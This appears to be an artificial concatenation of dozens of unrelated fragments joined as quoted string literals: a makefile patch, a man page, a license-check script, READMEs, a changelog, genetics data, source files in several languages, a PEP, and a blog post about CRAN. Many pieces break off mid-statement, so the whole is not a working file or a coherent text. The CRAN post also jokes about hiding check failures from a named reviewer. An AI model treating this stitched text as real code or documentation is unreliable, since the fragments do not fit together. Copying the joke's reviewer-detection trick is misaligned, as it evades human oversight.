'top', version: '1.2.3' },\n isTop: true,\n parent: null,\n resolve (n) {\n return n === 'a' ? a : n === 'b' ? b : null\n },\n addEdgeOut (edge) {\n this.edgesOut.set(edge.name, edge)\n },\n addEdgeIn (edge) {\n this.edgesIn.add(edge)\n },\n}\n\nconst a = {\n edgesOut:" +"--- GNUmakefile.orig\t2019-01-02 03:35:46 UTC\n+++ GNUmakefile\n@@ -3,7 +3,7 @@\n \n CPPFLAGS = -std=c++14 -O3 -DNDEBUG -ffast-math -fno-builtin-malloc -Wall -Wextra -Wshadow -Wconversion -Wuninitialized\n #CPPFLAGS = -std=c++14 -g -O0 -ffast-math -fno-builtin-malloc -Wall -Wextra -Wshadow -Wconversion -Wuninitialized\n-CXX = clang++\n+#CXX = clang++\n \n # Prefix for installations (Unix / Mac)\n \n@@ -80,7 +80,7 @@ WIN_INCLUDES = /I. /Iinclude /Iinclude/util /Iinclude/\n # Compile commands for individual targets.\n #\n \n-FREEBSD_COMPILE = $(CXX) -g $(CPPFLAGS) -DNDEBUG -fPIC $(INCLUDES) -D_REENTRANT=1 -shared $(SUNW_SRC) -Bsymbolic -o libhoard.so -lpthread\n+FREEBSD_COMPILE = $(CXX) $(CXXFLAGS) -DNDEBUG -fPIC $(INCLUDES) -D_REENTRANT=1 -shared $(SUNW_SRC) -Bsymbolic -o libhoard.so -pthread\n \n DEBIAN_COMPILE = $(CXX) -g -O3 -fPIC -DNDEBUG -I. -Iinclude -Iinclude/util -Iinclude/hoard -Iinclude/superblocks -IHeap-Layers -D_REENTRANT=1 -shared source/libhoard.cpp source/unixtls.cpp Heap-Layers/wrappers/wrapper.cpp -Bsymbolic -o libhoard.so -lpthread -lstdc++ -ldl" +".\\\" Copyright (c) 1993 Martin Birgmeier\n.\\\" All rights reserved.\n.\\\"\n.\\\" You may redistribute unmodified or modified versions of this source\n.\\\" code provided that the above copyright notice and this and the\n.\\\" following conditions are retained.\n.\\\"\n.\\\" This software is provided ``as is'', and comes with no warranties\n.\\\" of any kind. I shall in no event be liable for anything that happens\n.\\\" to anyone/anything when using this software.\n.\\\"\n.\\\" @(#)rand48.3 V1.0 MB 8 Oct 1993\n.\\\" $FreeBSD: src/lib/libc/gen/rand48.3,v 1.17 2005/01/20 09:17:02 ru Exp $\n.\\\"\n.Dd October 8, 1993\n.Dt RAND48 3\n.Os\n.Sh NAME\n.Nm drand48 ,\n.Nm erand48 ,\n.Nm jrand48 ,\n.Nm lcong48 ,\n.Nm lrand48 ,\n.Nm mrand48 ,\n.Nm nrand48 ,\n.Nm seed48 ,\n.Nm srand48\n.Nd pseudo random number generators and initialization routines\n.Sh LIBRARY\n.Lb libc\n.Sh SYNOPSIS\n.In stdlib.h\n.Ft double\n.Fo drand48\n.Fa void\n.Fc\n.Ft double\n.Fo erand48\n.Fa \"unsigned short xsubi[3]\"\n.Fc\n.Ft long\n.Fo jrand48\n.Fa \"unsigned short xsubi[3]\"\n.Fc\n.Ft void\n.Fo lcong48\n.Fa \"unsigned short param[7]\"\n.Fc\n.Ft long\n.Fo lrand48\n.Fa void\n.Fc\n.Ft long\n.Fo mrand48\n.Fa void\n.Fc\n.Ft long\n.Fo nrand48\n.Fa \"unsigned short xsubi[3]\"" +"\n\n\n\n\n \n \n\n\n\n \n \n \n\n\n\n" +"#!/bin/bash -e\n\n# Copyright 2016 tsuru authors. All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\n\nstatus=0\nfor f in `git ls-files | xargs grep -L \"Copyright\" | grep \".go\" | grep -v vendor/`\ndo\n echo $f\n status=1\ndone\n\nif [ $status != 0 ]\nthen\n exit $status\nfi\n\ntofix=\naddallyears=\nwhile [ \"${1-}\" != \"\" ]; do\n case $1 in\n \"-f\" | \"--fix\")\n tofix=true\n ;;\n \"--all\")\n addallyears=true\n ;;\n esac\n shift\ndone\n\noldIFS=$IFS\nIFS=$(echo -en \"\\n\\b\")\n\nfunction join_space { \n IFS=\" \"\n echo \"$*\"\n}\n\nfor f in $(git ls-files | grep -v vendor/ | grep -v check-license.sh | xargs -I{} bash -c '(egrep -Ho \"Copyright [0-9 ]+\" {})')\ndo\n IFS=\":\" read file copyright <<< \"$f\"\n IFS=\" \" read copy year <<< \"$copyright\"\n if [ -z $addallyears ]; then\n expectedYears=`git log --diff-filter=A --follow --format=%ad --date=format:%Y -1 -- $file`\n else\n expectedYears=$(join_space $(git log --follow --format=%ad --date=format:%Y -- $file | sort | uniq))\n fi\n if [[ $year != $expectedYears ]];\n then\n echo \"$file - Copyright $year, created: $expectedYears\"\n if [ -z \"$tofix\" ]; then\n status=1\n else\n sed -E -i \"\" \"s/Copyright [0-9 ]+/Copyright ${expectedYears} /g\" $file\n fi\n fi" +"``django-google-maps`` is a simple application that provides the basic\nhooks into google maps V3 api for use in Django models from Django\nversion 1.11+.\n\nStarting with ``django-google-maps`` version (0.7.0), Django 1.11+ is\nrequired because Django changed their widget template rendering system.\nVersion 0.8.0 supports Django 2.0+, and as such removes support for\nPython 2.7\n\nI\u2019m using this to allow someone from the admin panels to type a freeform\naddress, have the address geocoded on change and plotted on the map. If\nthe location is not 100% correct, the user can drag the marker to the\ncorrect spot and the geo coordinates will update.\n\nStatus\n~~~~~~\n\n|Build Status|\n\nUSAGE:\n------\n\n- include the ``django_google_maps`` app in your ``settings.py``\n\n- Add your Google Maps API Key in your ``settings.py`` as\n ``GOOGLE_MAPS_API_KEY``\n\n- create a model that has both an address field and geolocation field\n\n .. code:: python\n\n from django.db import models\n from django_google_maps import fields as map_fields\n\n class Rental(models.Model):\n address = map_fields.AddressField(max_length=200)\n geolocation = map_fields.GeoLocationField(max_length=100)\n\n- in the ``admin.py`` include the following as a formfield_override\n\n .. code:: python\n\n from django.contrib import admin\n from django_google_maps import widgets as map_widgets\n from django_google_maps import fields as map_fields\n\n class RentalAdmin(admin.ModelAdmin):\n formfield_overrides = {\n map_fields.AddressField: {'widget': map_widgets.GoogleMapsAddressWidget}," +"# Changelog\n\nAll notable changes to `laravel-google-calendar` will be documented in this file\n\n## 3.1.0 - 2020-09-08\n\n- add support for Laravel 8\n\n## 3.0.0 - 2020-08-24\n\n- add support for OAuth2 authentication, source property on events (#163)\n\n## 2.6.2 - 2020-07-19\n\n- allow `CarbonImmutable` date (#160)\n\n## 2.6.1 - 2020-04-17\n\n- revert changes of previous release\n\n## 2.6.0 - 2020-04-17\n\n- make factory more flexible\n\n## 2.5.3 - 2020-04-17\n\n- make factory more flexible\n\n## 2.5.2 - 2020-04-14\n\n- add quick save (#147)\n\n## 2.5.1 - 2020-04-01\n\n- allow usage of Carbon immutable (#141)\n\n## 2.5.0 - 2020-03-03\n\n- add support for Laravel 7\n\n## 2.4.0 - 2020-02-20\n\n- allow passing array of credentials (#139)\n\n## 2.3.2 - 2019-12-16\n- Fixed fetching more than 250 results of calendar events (#133)\n\n## 2.3.1 - 2019-12-15\n- Add getter for calendar ID per event (#131)\n\n## 2.3.0 - 2019-09-04\n- Laravel 6 compatibility; dropped support for older versions\n\n## 2.2.2 - 2019-02-27\n- allow carbon v2\n\n## 2.2.1 - 2018-09-27\n- `listEvents` now returns events sorted chronologically\n\n## 2.2.0 - 2018-01-10\n- add ability to add query params\n\n## 2.1.1 - 2017-10-16\n- improve sorting\n\n## 2.1.0 - 2017-10-15\n- add" +"const format = require('string-format');\n\nexports.trim = value => (typeof value === 'string' ? value.trim() : value);\n\nexports.reverse = value =>\n typeof value === 'string'\n ? value\n .split('')\n .reverse()\n .join('')\n : value;\n\nexports.slice = (value, start, end) =>\n typeof value === 'string' ? value.slice(start, end) : value;\n\nexports.replace = (value, searchValue, replaceValue) =>\n typeof value === 'string' ? value.replace(searchValue, replaceValue || '') : value;\n\nexports.substr = (value, from, length) =>\n typeof value === 'string' ? value.substr(from, length) : value;\n\nexports.int = value => {\n const intValue = parseInt(value);\n return isNaN(intValue) ? value : intValue;\n};\n\nexports.split = (value, char, index) => {\n if (typeof value === 'string') {\n if (char === '%SPECIAL_CHAR%') {\n char = '|';\n }\n const results = value.split(char);\n if (results[index] !== undefined) {\n return results[index];\n }\n }\n return value;\n};\n\nexports.format = (value, formatStr) => format(formatStr, value);\n\nexports.until = (value, str) =>\n typeof value === 'string' && value.indexOf(str) > 0 ? value.substr(0, value.indexOf(str)) : value;\n\nexports.match = (value, str) =>\n typeof value === 'string' && value.match(new RegExp(str)) !== null\n ? value.match(new RegExp(str))[1]\n : value;\n\nexports.decodeURIComponent = value =>\n typeof value === 'string' ? decodeURIComponent(value) : value;" +"#pragma once\n\n#include \"BaseTheme.hpp\"\n#include \"common/Singleton.hpp\"\n#include \"util/RapidJsonSerializeQString.hpp\"\n\n#include \n#include \n#include \n#include \n\nnamespace chatterino {\n\nclass WindowManager;\n\nclass Theme final : public Singleton, public BaseTheme\n{\npublic:\n Theme();\n\n /// SPLITS\n struct {\n QColor messageSeperator;\n QColor background;\n QColor dropPreview;\n QColor dropPreviewBorder;\n QColor dropTargetRect;\n QColor dropTargetRectBorder;\n QColor resizeHandle;\n QColor resizeHandleBackground;\n\n struct {\n QColor border;\n QColor background;\n QColor text;\n QColor focusedText;\n // int margin;\n } header;\n\n struct {\n QColor border;\n QColor background;\n QColor selection;\n QColor focusedLine;\n QColor text;\n QString styleSheet;\n // int margin;\n } input;\n } splits;\n\n void normalizeColor(QColor &color);\n\nprivate:\n void actuallyUpdate(double hue, double multiplier) override;\n void fillLookupTableValues(double (&array)[360], double from, double to,\n double fromValue, double toValue);\n\n double middleLookupTable_[360] = {};\n double minLookupTable_[360] = {};\n\n pajlada::Signals::NoArgSignal repaintVisibleChatWidgets_;\n\n friend class WindowManager;\n};\n\n} // namespace chatterino" +" 'Import',\n 'start_import' => 'Start Import',\n 'import_running' => 'Import running...',\n 'import_file' => 'File for Import',\n\n 'import_help' => 'You can import your existing browser bookmarks here. Usually, bookmarks are exported into an .html file by your browser. Select the file here and start the import.
    Depending on the number of bookmarks this process may take some time.',\n\n 'import_networkerror' => 'Something went wrong while trying to import the bookmarks. Please check your browser console for details or consult the application logs.',\n 'import_error' => 'Something went wrong while trying to import the bookmarks. Please consult the application logs.',\n 'import_empty' => 'Could not import any bookmarks. Either the uploaded file is corrupt or empty.',\n 'import_successfully' => ':imported links imported successfully, :skipped skipped.',\n];" +"A1\tA2\tN\tSNP\tZ\nA\tG\t10000.000\trs0\t-5.269\nA\tG\t10000.000\trs1\t0.500\nA\tG\t10000.000\trs2\t-1.079\nA\tG\t10000.000\trs3\t-0.574\nA\tG\t10000.000\trs4\t-0.460\nA\tG\t10000.000\trs5\t-0.671\nA\tG\t10000.000\trs6\t-1.189\nA\tG\t10000.000\trs7\t5.956\nA\tG\t10000.000\trs8\t-0.483\nA\tG\t10000.000\trs9\t-2.527\nA\tG\t10000.000\trs10\t3.342\nA\tG\t10000.000\trs11\t2.692\nA\tG\t10000.000\trs12\t0.048\nA\tG\t10000.000\trs13\t-2.656\nA\tG\t10000.000\trs14\t-2.447\nA\tG\t10000.000\trs15\t-3.625\nA\tG\t10000.000\trs16\t-4.099\nA\tG\t10000.000\trs17\t-0.403\nA\tG\t10000.000\trs18\t-4.030\nA\tG\t10000.000\trs19\t3.820\nA\tG\t10000.000\trs20\t7.138\nA\tG\t10000.000\trs21\t-1.128\nA\tG\t10000.000\trs22\t-0.504\nA\tG\t10000.000\trs23\t-1.229\nA\tG\t10000.000\trs24\t1.220\nA\tG\t10000.000\trs25\t-3.719\nA\tG\t10000.000\trs26\t-0.410\nA\tG\t10000.000\trs27\t-3.132\nA\tG\t10000.000\trs28\t-0.045\nA\tG\t10000.000\trs29\t1.881\nA\tG\t10000.000\trs30\t-0.869\nA\tG\t10000.000\trs31\t3.947\nA\tG\t10000.000\trs32\t5.499\nA\tG\t10000.000\trs33\t-0.183\nA\tG\t10000.000\trs34\t-2.974\nA\tG\t10000.000\trs35\t4.575\nA\tG\t10000.000\trs36\t2.838\nA\tG\t10000.000\trs37\t0.169\nA\tG\t10000.000\trs38\t3.906" +"# coding: utf-8\n\n# https://forum.omz-software.com/topic/3039/share-draw-text-in-a-circle-not-earth-shattering/2\n\nimport ui\n# Pythonista Forum - @Phuket2\n# for @ccc , should be pep8 ok and pyflakes :)\n\n# No break through here. just expanded on the Pythonista help\n# code for ui.ImageContext\n\n\n# draw text in a circle, and return a ui.image\ndef text_in_circle(r,\n text,\n text_color = 'white',\n circle_color = 'teal',\n circle_alpha = 1.0,\n font_name = 'Arial Rounded MT Bold',\n inset_percent = 0):\n\n\t'''\n\ttext_in_circle - * denotes a param\n\t==============\n\t*r-ui.Rect or tuple (0, 0, 0, 0) - the bounding rect for the circle.\n\t\n\t*text-text to draw in the circle\n\t\n\t*text_color-color of the text drawn inside the circle\n\t\n\t*circle_color-color of the circle\n\t\n\t*circle_alpha-alpha setting applied to circle color. Note, did this\n\tfor a reason. easier to use string names for colors!\n\t\n\t*font_name-the font used to render the *text\n\t\n\t*inset_percent-reduces *r by a percentage for l,t,w,h for possible\n\tbetter placement of the text inside the circle. a.k.a margin\n\t\n\tRETURNS - a rendered uiImage\n\t\n\t'''\n\t\n\t# this inner function does not need to be here, was just to keep it\n\t# all together\n\tdef get_max_fontsize(r, text, font_name, inset_rect = ui.Rect()):\n\t\tr1 = ui.Rect(*r).inset(*inset_rect)\n\t\tfor i in xrange(5, 1000):\n\t\t\tw, h = ui.measure_string(text, max_width=0,\n\t\t\tfont=(font_name, i)," +"// @flow\n\nimport * as React from \"react\";\nimport Grid from \"../Grid\";\nimport type { MouseEvents, PointerEvents, FocusEvents } from \"../../\";\n\ntype Props = {|\n ...MouseEvents,\n ...PointerEvents,\n ...FocusEvents,\n +className?: string,\n +value: string | number,\n +imageURL: string,\n +col?: {|\n +width?: number,\n +sm?: number,\n +md?: number,\n +lg?: number,\n |},\n|};\n\nfunction FormImageCheckItem({\n className,\n col: { width = 6, sm = 4, md = 0, lg = 0 } = {},\n imageURL,\n value,\n onClick,\n onMouseEnter,\n onMouseLeave,\n onPointerEnter,\n onPointerLeave,\n onFocus,\n onBlur,\n}: Props): React.Node {\n return (\n \n \n \n );\n}\n\nFormImageCheckItem.displayName = \"Form.ImageCheckItem\";\n\nexport default FormImageCheckItem;" +"35\n15\n11\n13\n17\n11\n9\n3\n3\n5\n11\n15\n7\n3\n9\n7\n9\n49\n7\n7\n5\n3\n9\n21\n11\n5\n19\n11\n11\n13\n7\n23\n21\n13\n7\n5\n17\n0\n7\n3\n17\n15\n5\n7\n3\n3\n17\n21\n21\n25\n15\n3\n3\n13\n15\n5\n9\n9\n11\n9\n19\n27\n7\n13\n19\n9\n7\n7\n7\n3\n5\n3\n5\n31\n3\n21\n11\n21\n13\n7\n2\n7\n13\n5\n17\n7\n5\n23\n2\n13\n7\n21\n11\n5\n7\n9\n7\n11\n23\n7\n7\n9\n5\n11\n11\n7\n17\n15\n13\n7\n15\n5\n3\n19\n15\n7\n11\n11\n37\n7\n5\n5\n41\n9\n5\n11\n9\n17\n7\n11\n5\n19\n13\n15\n37\n9\n15\n27\n27\n7\n7\n9\n5\n5\n21\n7\n15\n13\n23\n21\n21\n2\n2\n21\n5\n0\n7\n27\n5\n3\n15\n21\n9\n5\n19\n7\n3\n11\n13\n9\n5\n25\n11\n13\n7\n11\n13\n28\n19\n5\n5\n11\n9\n31\n19\n5\n15\n19\n11\n21\n9\n3\n15\n3\n17\n9\n3\n27\n17\n3" +"\"\"\"\nA type and singleton value (like None) to represent fields that\nhave not been initialized.\n\"\"\"\n\nfrom __future__ import unicode_literals, absolute_import\n\n\nclass UndefinedType(object):\n\n _instance = None\n\n def __str__(self):\n return 'Undefined'\n\n def __repr__(self):\n return 'Undefined'\n\n def __eq__(self, other):\n return self is other\n\n def __ne__(self, other):\n return self is not other\n\n def __bool__(self):\n return False\n\n __nonzero__ = __bool__\n\n def __lt__(self, other):\n self._cmp_err(other, '<')\n\n def __gt__(self, other):\n self._cmp_err(other, '>')\n\n def __le__(self, other):\n self._cmp_err(other, '<=')\n\n def __ge__(self, other):\n self._cmp_err(other, '>=')\n\n def _cmp_err(self, other, op):\n raise TypeError(\"unorderable types: {0}() {1} {2}()\".format(\n self.__class__.__name__, op, other.__class__.__name__))\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = object.__new__(cls)\n elif cls is not UndefinedType:\n raise TypeError(\"type 'UndefinedType' is not an acceptable base type\")\n return cls._instance\n\n def __init__(self):\n pass\n\n def __setattr__(self, name, value):\n raise TypeError(\"'UndefinedType' object does not support attribute assignment\")\n\n\nUndefined = UndefinedType()" +"/**\n * cn - \u8868\u5355\u5757 (\u65e7)\n * -- Form.Block\u5df2\u4e0d\u63a8\u8350\uff0c\u5efa\u8bae\u4f7f\u7528 FieldSet\n * -- Block \u7c7b\u4f3c Form\uff0c\u53ef\u4ee5\u5b58\u53d6\u6570\u636e\uff0c\u53ea\u662f\u6ca1\u6709 Submit \u80fd\u529b\u3002\u4e00\u822c\u7528\u5728 Form \u4e2d\u5904\u7406\u590d\u6742\u6570\u636e\u3002\n * -- Block \u5185\u7ec4\u4ef6\u8bbe\u7f6e\u7684 name \u53ea\u5728\u8fd9\u4e2a Block \u5185\u6709\u6548\uff0c\u53ea\u80fd\u5b58\u53d6 Block \u7684 value \u4e2d\u7684\u6570\u636e\uff0c\u4e0d\u80fd\u5b58\u53d6 Form \u7684\u6570\u636e\u3002\n * en - Block (Out of date)\n * -- Not recommend, use FieldSet instead.\n * -- Block is similar to Form except submit\n * -- The name set in the Block component is valid only in this block. It can only access the data in the value of instead of the Form.\n */\nimport React, { PureComponent } from 'react'\nimport { Form, Input } from 'shineout'\n\nexport default class extends PureComponent {\n constructor(props) {\n super(props)\n\n this.rules = {\n password: [\n { required: true, message: 'Please enter password.' },\n { min: 7, message: 'Password must be at least {min} characters.' },\n { regExp: /[a-z]+/i, message: 'Password at least has one letter.' },\n (value, formdata, callback) => {\n if (/\\d+/.test(value)) callback(true)\n else callback(new Error('Password at least has one numeral.'))\n },\n ],\n }\n\n this.colors = ['red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'violet']\n }\n\n render() {\n return (\n
    \n console.log(d)}>\n \n \n \n\n : ObservableObject where StateType: StateMachine {\n \n private let initialState: StateType\n private var subsequentStates: [StateType] = []\n\n public let objectWillChange = PassthroughSubject()\n \n public init(state: StateType) {\n initialState = state\n }\n \n var allStates: [StateType] {\n [[initialState], subsequentStates].flatMap({ $0 })\n }\n \n var stateCount: Int {\n 1 + subsequentStates.count\n }\n \n var currentStateIndex: Int = 0 {\n didSet {\n withAnimation {\n objectWillChange.send(())\n }\n }\n }\n \n /// The current state of the store. This will update as time traveling occurs.\n public var state: StateType {\n allStates[currentStateIndex]\n }\n \n /// Dispatches an event to be applied to the current state.\n public func dispatch(event: StateType.Event) {\n var newState = state\n newState.update(with: event)\n subsequentStates.append(newState)\n currentStateIndex = stateCount - 1\n }\n \n}" +"prefix}postmeta WHERE meta_key = 'simplefavorites_count'\";\n\t\t$count = $wpdb->get_var( $query );\n\t\tif ( (is_multisite()) && (isset($site_id) && ($site_id !== \"\")) ) restore_current_blog();\n\t\treturn intval($count);\n\t}\n}" +"[![Maintenance Status][maintenance-image]](#maintenance-status)\n\n\n

    react-game-kit

    \n\n

    \n Make games with React & React Native!\n

    \n\n***\n\n\n\n\n\n\n## Install\n\n`npm install react-game-kit --save`\n\n## Get Started\n\n`react-game-kit` provides a set of helper components to make it easier to create games with React and React Native.\n\nYou'll want to begin by importing the components you need:\n\n```js\nimport { Loop, Stage } from 'react-game-kit';\n```\n\n### Loop & Stage\n\nNext, in your render method of your top level component, you'll want to put the `Loop` component at the top level, optionally followed by the `Stage` component:\n\n```js\nrender() {\n return (\n \n \n // Game specific components go here\n \n \n );\n}\n```\n\nThe `Loop` component uses `context` to pass a subscribable game tick down your component tree. The `Stage` component does the same with game scale.\n\n### World\n\nIf you intend on using physics in your game, a good next component would be the `World` component, which creates and provides a physics engine & world:\n\n```js\nrender() {\n return (\n \n \n \n // Game specific components go here\n \n \n \n );\n}\n```\n\n### Physics Bodies\n\nOnce you have a" +"var keys = require('./keys')\n\n/**\n * \u63a5\u6536\u4e00\u4e2a\u51fd\u6570\u4f5c\u4e3a\u7d2f\u52a0\u5668\uff0c\u6570\u7ec4\u4e2d\u7684\u6bcf\u4e2a\u503c\uff08\u4ece\u5de6\u5230\u53f3\uff09\u5f00\u59cb\u5408\u5e76\uff0c\u6700\u7ec8\u4e3a\u4e00\u4e2a\u503c\u3002\n *\n * @param {Array} array \u6570\u7ec4\n * @param {Function} callback \u65b9\u6cd5\n * @param {Object} initialValue \u521d\u59cb\u503c\n * @return {Number}\n */\nfunction reduce (array, callback, initialValue) {\n if (array) {\n var len, reduceMethod\n var index = 0\n var context = null\n var previous = initialValue\n var isInitialVal = arguments.length > 2\n var keyList = keys(array)\n if (array.length && array.reduce) {\n reduceMethod = function () {\n return callback.apply(context, arguments)\n }\n if (isInitialVal) {\n return array.reduce(reduceMethod, previous)\n }\n return array.reduce(reduceMethod)\n }\n if (isInitialVal) {\n index = 1\n previous = array[keyList[0]]\n }\n for (len = keyList.length; index < len; index++) {\n previous = callback.call(context, previous, array[keyList[index]], index, array)\n }\n return previous\n }\n}\n\nmodule.exports = reduce" +"// PRUSA Mendel\n// Endstop holder extra adapter rotator\n// Used to rotate endstops for Prusa i2/i3 endstop holders\n// GNU GPL v3\n// Ethan Sherman\n// ethan@blackguest.net\n\ninclude <../configuration.scad>\n\n/**\n * This endstop adapter has 3 holes for endstops with either 10mm or 20mm spacing.\n * It is designed to fit on the original endstop-holder to rotate a mechanical endstop 90 degrees.\n *\n * @id endstop-holder-extra\n * @name Endstop holder extra\n * @category Printed\n */\nmodule endstop_extra(shaft_radius){\n screw_hole_spacing = 20;\n screw_hole_spacing2 = 10;\n\n segments=64;\n\n difference(){\n\t union(){\n // for reference, here is the main endstop arm\n\t\t //translate([-30, 0, 0]) cube([40, 4, 10]);\n\n // endstop arm mount\n translate([-20, -35.99, -5]) cube([10, 35, 5]);\n // main sliding endstop mount slider plate\n translate([-30, -5, -5]) cube([30, 5, 15]);\n // extra overhang support (may not be easy to print in this orientation)\n //#translate([-30, -0, -5]) cube([30, 6, 5]);\n\n // extra curved arm support (optional)\n difference(){\n translate([-30, -15, -5]) cube([30, 11, 5]);\n translate([-10, -10, -10]) rotate([0, 0, 90])\n translate([-5, -10, -1]) rotate([0, 0, 0]) cylinder(h =20, r = 10, $fn = segments);\n translate([-40, -10, -10]) rotate([0, 0, 90])\n translate([-5, -10, -1]) rotate([0, 0, 0]) cylinder(h =20, r = 10, $fn = segments);\n }\n\t }\n\n //" +"#include \"decode.h\"\n\n#define MAX_OGG_PAGE_LEN 100000\n\n\ntypedef struct {\n FILE *fp;\n uint8_t *page_buf;\n int page_len;\n int consumed;\n int raw_opus;\n uint8_t version;\n uint8_t header_type;\n uint8_t seg_length;\n uint8_t page_segs;\n uint64_t granule_pos;\n uint32_t bs_serial;\n uint32_t page_sn;\n uint32_t checksum;\n uint8_t seg_len_table[255];\n uint8_t current_segment;\n uint8_t packets_in_page;\n}opus_obj_t;\n\ntypedef struct _nalu_item_t {\n\tuint8_t *buf;\n\tint len;\n\tstruct slice_header_t slice;\n\tstruct nalu_t nalu;\n}nalu_item_t;\n\ntypedef struct {\n FILE *fp;\n h264_dec_obj_t *h264_handle;\n nalu_item_t *curr_nalu;\n nalu_item_t *next_nalu;\n}h264_obj_t;\n\n\nint init_video(h264_obj_t *handle, const char *video_file);\nint reset_video(h264_obj_t *handle);\nint get_video_frame(h264_obj_t *handle, uint8_t *buf, uint32_t *length, int *end_of_frame);\nint init_audio(opus_obj_t *handle, const char *audio_file, int raw_opus);\nvoid close_audio(opus_obj_t *handle);\nint reset_audio(opus_obj_t *handle);\nint get_audio_packet(opus_obj_t *handle, uint8_t *buf, uint32_t *length);" +"---\ntitle: Travis CI for R?\ndate: '2013-04-07'\nslug: travis-ci-for-r\n---\n\nI'm always worried about [CRAN](http://cran.r-project.org): a system maintained by FTP and emails from real humans (basically one of Uwe, Kurt or Prof Ripley). I'm worried for two reasons:\n\n1. The number of R packages is growing _exponentially_;\n2. Time and time again I see frustrations from both parties (CRAN maintainers and package authors);\n\nI have a good solution for 2, which is to keep silent when your submission passes the check system, and say \"Sorry!\" no matter if you agree with the reason or not when it did not pass (which made one maintainer unhappy), but do not argue -- just go back and fix the problem if you know what is the problem; or use dark voodoo to hide (yes, _hide_, not solve) the problem if you are sure you are right. If you read the mailing list frequently, you probably remember that `if (CRAN)` discussion. The solution in my mind was `if (Sys.getenv('USER') == 'ripley')`.\n\nThe key is, do not argue. Silence is gold.\n\n![You shall not pass](https://db.yihui.org/imgur/3mdv0k9.jpg)\n\nThe CRAN maintainers have been volunteering their time, and we should respect them. The question is, will this approach" +"PEP: 638\nTitle: Syntactic Macros\nAuthor: Mark Shannon \nStatus: Draft\nType: Standards Track\nContent-Type: text/x-rst\nCreated: 24-Sep-2020\n\nAbstract\n========\n\nThis PEP adds support for syntactic macros to Python.\nA macro is a compile-time function that transforms\na part of the program to allow functionality that cannot be\nexpressed cleanly in normal library code.\n\nThe term \"syntactic\" means that this sort of macro operates on the program's\nsyntax tree. This reduces the chance of mistranslation that can happen\nwith text-based substitution macros, and allows the implementation\nof `hygienic macros`__.\n\n__ https://en.wikipedia.org/wiki/Hygienic_macro\n\nSyntactic macros allow libraries to modify the abstract syntax tree during compilation,\nproviding the ability to extend the language for specific domains without\nadding to complexity to the language as a whole.\n\nMotivation\n==========\n\nNew language features can be controversial, disruptive and sometimes divisive.\nPython is now sufficiently powerful and complex, that many proposed additions \nare a net loss for the language due to the additional complexity.\n\nAlthough a language change may make certain patterns easy to express,\nit will have a cost. Each new feature makes the language larger,\nharder to learn and harder to understand.\nPython was once described as `Python Fits Your Brain`__,\nbut that becomes" +"module.exports = [\n\t[\n\t\t/Should not import the named export '2' \\(imported as 'c'\\) from default-exporting module \\(only default export is available soon\\)/\n\t],\n\t[\n\t\t/Should not import the named export 'aa' \\(imported as 'aa'\\) from default-exporting module \\(only default export is available soon\\)/\n\t],\n\t[\n\t\t/Should not import the named export 'bb' \\(imported as 'bb'\\) from default-exporting module \\(only default export is available soon\\)/\n\t],\n\t[\n\t\t/Should not import the named export 'named' \\(imported as 'named'\\) from default-exporting module \\(only default export is available soon\\)/\n\t],\n\t[\n\t\t/Should not import the named export 'named' \\(imported as 'gnamed'\\) from default-exporting module \\(only default export is available soon\\)/\n\t]\n];" +"# -*- coding: utf-8 -*-\n\"\"\"A X509Adapter for use with the requests library.\n\nThis file contains an implementation of the X509Adapter that will\nallow users to authenticate a request using an arbitrary\nX.509 certificate without needing to convert it to a .pem file\n\n\"\"\"\n\nfrom OpenSSL.crypto import PKey, X509\nfrom cryptography import x509\nfrom cryptography.hazmat.primitives.serialization import (load_pem_private_key,\n load_der_private_key)\nfrom cryptography.hazmat.primitives.serialization import Encoding\nfrom cryptography.hazmat.backends import default_backend\n\nfrom datetime import datetime\nfrom requests.adapters import HTTPAdapter\nimport requests\n\nfrom .._compat import PyOpenSSLContext\nfrom .. import exceptions as exc\n\n\"\"\"\nimporting the protocol constants from _ssl instead of ssl because only the\nconstants are needed and to handle issues caused by importing from ssl on\nthe 2.7.x line.\n\"\"\"\ntry:\n from _ssl import PROTOCOL_TLS as PROTOCOL\nexcept ImportError:\n from _ssl import PROTOCOL_SSLv23 as PROTOCOL\n\n\nclass X509Adapter(HTTPAdapter):\n r\"\"\"Adapter for use with X.509 certificates.\n\n Provides an interface for Requests sessions to contact HTTPS urls and\n authenticate with an X.509 cert by implementing the Transport Adapter\n interface. This class will need to be manually instantiated and mounted\n to the session\n\n :param pool_connections: The number of urllib3 connection pools to\n cache.\n :param pool_maxsize: The maximum number of connections to save in the\n pool.\n :param max_retries: The maximum" +"/* eslint no-restricted-syntax: \"off\" */\n\nexport const isMessage = event => Boolean(event.type === 'message' && event.text);\n\nexport const isMessageToChannel = message => typeof message.channel === 'string' && message.channel[0] === 'C';\n\nexport const isFromUser = (event, userId) => event.user === userId;\n\nexport const messageContainsText = (message, possibleTexts) => {\n const messageText = message.text.toLowerCase();\n const texts = Array.isArray(possibleTexts) ? possibleTexts : [possibleTexts];\n for (const text of texts) {\n if (messageText.indexOf(text.toLowerCase()) > -1) {\n return true;\n }\n }\n\n return false;\n};\n\nexport const filterJokesByCategories = (jokes, categories) => jokes.filter((joke) => {\n if (joke.categories.length === 0) {\n return true;\n }\n\n for (const category of categories) {\n if (joke.categories.includes(category)) {\n return true;\n }\n }\n\n return false;\n});\n\nexport const pickRandom = arr => arr[Math.floor(Math.random() * arr.length)];" +"require 'digest/sha1'\nrequire 'sequel'\nrequire 'sequel/extensions/migration'\n\nSequel::Model.db = \n if defined?(RUBY_ENGINE) && RUBY_ENGINE == 'jruby'\n require 'jdbc/sqlite3' \n Sequel.connect(\"jdbc:sqlite::memory:\")\n else\n require 'sqlite3'\n Sequel.sqlite(\":memory:\")\n end\n\nmigration = Sequel.migration do\n up do\n create_table :accounts do\n primary_key :id\n String :name\n String :surname\n String :email\n String :crypted_password\n String :role\n end\n\n create_table :sections do\n primary_key :id\n foreign_key :account_id\n String :name\n end\n\n create_table :friends do\n primary_key :id\n String :name\n String :age\n String :email\n end\n\n create_table :pages do\n primary_key :id\n String :name\n String :body\n end\n end\n\n down do\n drop_table :accounts\n end\nend\n\nmigration.apply(Sequel::Model.db, :up)\n\nclass Friend < Sequel::Model\nend\n\nclass Page < Sequel::Model\nend\n\n# Fake Section Model\nclass Section < Sequel::Model\n many_to_one :account\nend\n\n# Fake Account Model\nclass Account < Sequel::Model\n attr_accessor :password, :password_confirmation\n\n one_to_many 